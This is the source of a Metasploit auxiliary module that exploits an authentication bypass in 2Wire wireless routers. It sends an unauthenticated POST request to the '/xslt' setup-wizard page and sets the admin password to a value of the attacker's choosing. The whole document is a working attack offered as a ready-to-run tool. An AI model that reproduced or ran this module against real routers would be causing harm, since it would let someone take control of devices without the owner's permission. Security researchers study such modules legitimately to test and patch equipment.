require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => '2Wire Password Reset', 'Version' => '$Revision: 1 $', 'Description' => %Q{ This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenicated and doesn't remove or block after first access. }, 'Author' => 'Travis Phillips', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(80), OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin']) ], self.class) end def run begin print_status("Attempting to rest password to #{datastore['PASSWORD']} on #{rhost}\n") res = send_request_cgi( { 'method' => 'POST', 'uri' => '/xslt', 'data' => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=', }, 25) if (res.code == 200) if (res.headers['Set-Cookie']) print_status("Password reset successful!\n") end end end end end